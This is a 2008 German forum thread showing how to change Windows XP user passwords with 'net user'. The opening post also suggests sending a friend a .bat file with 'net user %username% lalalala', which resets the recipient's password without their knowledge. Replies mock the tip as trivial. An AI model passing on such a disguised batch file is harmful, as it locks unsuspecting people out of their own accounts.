Register for your free account! | Forgot your password?

Go Back   elitepvpers > Off-Topics > Tutorials
You last visited: Today at 15:44

  • Please register to post and access all features, it's quick, easy and FREE!

Advertisement



Windows XP Passwort von anderen Usern ändern

Discussion on Windows XP Passwort von anderen Usern ändern within the Tutorials forum part of the Off-Topics category.

Reply
 
Old   #1
 
unknown661's Avatar
 
elite*gold: 0
Join Date: Oct 2008
Posts: 314
Received Thanks: 160
Windows XP Passwort von anderen Usern ändern

Also ihr braucht dafür Adminrechte.

Windows+R drücken, die Commandbox öffnen, indem ihr cmd eingebt und dort dann folgendes eingeben:

net user [Benutzername] [Neues Passwort]


also zB wenn ihr vom Benutzer Dummy das passwort auf admin ändern wollt:

net user Dummy admin

edit: ihr könnt z.B. einem freund die datei als bat datei schicken indem ihr folgendes reinschreibt

net user %username% lalalala


somit müsst ihr seinen benutzernamen gar nicht mehr wissen und das passwort wird auf lalalala geändert

unknown661
unknown661 is offline  
Old 11/04/2008, 22:47   #2
 
elite*gold: 0
Join Date: May 2008
Posts: 1,694
Received Thanks: 209
Start -> Systemsteuerung -> Benutzerkonten
Jack's Wasted Life is offline  
Old 11/05/2008, 09:11   #3
 
unknown661's Avatar
 
elite*gold: 0
Join Date: Oct 2008
Posts: 314
Received Thanks: 160
Quote:
Originally Posted by Jack's Wasted Life View Post
Start -> Systemsteuerung -> Benutzerkonten
ja aber bei der oben genannten methode braucht man das alte passwort nicht und kann dadurch von jedem beliebigem user am pc das pw ändern.
unknown661 is offline  
Old 11/05/2008, 22:31   #4
 
scbiz's Avatar
 
elite*gold: 196
Join Date: Nov 2005
Posts: 625
Received Thanks: 192
Bringst du auch bald ein Tutorial raus, das zeigt wie man das Programm shutdown.exe benutzt? Vielleicht handelt es sich hierbei ja um deinen persönlichen Durchbruch, aber die Windows Befehle sollten nicht nur Systemadministratoren bekannt sein...
scbiz is offline  
Reply


Similar Threads Similar Threads
Windows 7 passwort umgehen
06/12/2010 - Technical Support - 16 Replies
hi, ich wollte fragen ob es ne möglichkeit gibt das password von windows 7 zu umgehen aber das passwort noch erhalten bleibt.
Passwort für die DB ändern.
03/25/2010 - Metin2 Private Server - 0 Replies
Hallo Leute. Ich hab das Passwort von root geändert und das läuft soweit auch. Aber das passwort für die db wenn ich mich mit navicat connecte, ist immernoch 123456. wie ändere ich das?
windows passwort sehen
01/29/2010 - Main - 9 Replies
also Leute ich weis ja wie man passwort ändert/entfernt mit dem net user befehl aber kann man auch irgendwie per cmd das passwort eines benutzers(admin) sehen??? Hab schon mal versucht mit net user "Benutzername" dann kommen ganz viel Informationen über den benutzer aber nun mal nich das passwort. Geht das irgendwie mit cmd? wenn nein wie gehts dann ? Hab mal von so eim programm gehöhrt was man auf eine Cd brennen muss und dann per bios oder so starten muss sowas brauch ich nicht denn mein...
epvp*Server[TS] / Besprecht eure Metin2 probleme hier mit anderen usern LIVE
09/29/2009 - Metin2 Private Server - 18 Replies
Ich will hiermit nochmals darauf hinweisen, dass wir seit einiger Zeit einen Teamspeak Server extra für epvp eröffnet haben. Die IP lautet : 81.89.110.33:9196 Wir freuen uns über jeden Besucher ;) Edit : Es gibt sogar einen extra Channel für so ziemlich jedes Spiel. http://www.youtube.com/watch?v=DHyJwZh4xMs&hd =1



All times are GMT +2. The time now is 15:44.


Powered by vBulletin®
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.
This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

Support | Contact Us | FAQ | Advertising | Privacy Policy | Terms of Service | Abuse
Copyright ©2024 elitepvpers All Rights Reserved.